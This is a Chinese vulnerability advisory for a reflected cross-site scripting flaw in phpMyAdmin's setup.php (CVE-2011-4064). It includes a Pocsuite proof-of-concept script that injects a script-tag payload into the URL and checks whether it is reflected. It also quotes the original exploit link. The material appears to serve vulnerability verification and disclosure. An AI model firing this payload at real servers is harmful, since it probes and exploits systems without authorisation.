Bugtraq ID: 50175
CVE ID:CVE-2011-4064
phpMyAdmin是一款基于PHP的MySQL管理程序。
部分传递给setup.php的输入在返回用户之前缺少过滤,攻击者构建恶意链接,诱使用户解析,可导致恶意脚本在目标用户浏览器上执行,可获得目标用户敏感信息或劫持用户会话。
如果存在配置目录并可写,那么XSS负载可保存在此目录中。
phpMyAdmin 3.x
厂商解决方案
phpMyAdmin 3.4.6已经修复此漏洞,建议用户下载使用:
http://www.phpmyadmin.net/
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests
'''
原始利用链接:
http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script>
借鉴wvs使用prompt替代alert一定程度绕过限制,并使用特殊字段进行匹配:
<script>prompt("SEBUG@TEST");</script>
'''
class TestPOC(POCBase):
vulID = '23110' # ssvid
version = '1.0'
author = ['XXXXX']
vulDate = ''
createDate = '2016-01-01'
updateDate = '2016-01-01'
references = ['http://www.sebug.net/vuldb/ssvid-23110']
name = 'phpMyAdmin Setup接口跨站脚本漏洞'
appPowerLink = 'http://www.phpmyadmin.net/'
appName = 'phpMyAdmin'
appVersion = ''
vulType = 'XSS'
desc = '''
'''
samples = ['']
def _verify(self):
result = {}
vulurl = self.url + "/phpMyAdmin-2.11.1/scripts/setup.php?>'" + '"><script>prompt("SEBUG@TEST");</script>'
resp = requests.get(vulurl)
print resp.url
if '<script>prompt("SEBUG@TEST");</script>' in resp.content:
result['XSSInfo'] = {}
result['XSSInfo']['URL'] = resp.url
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)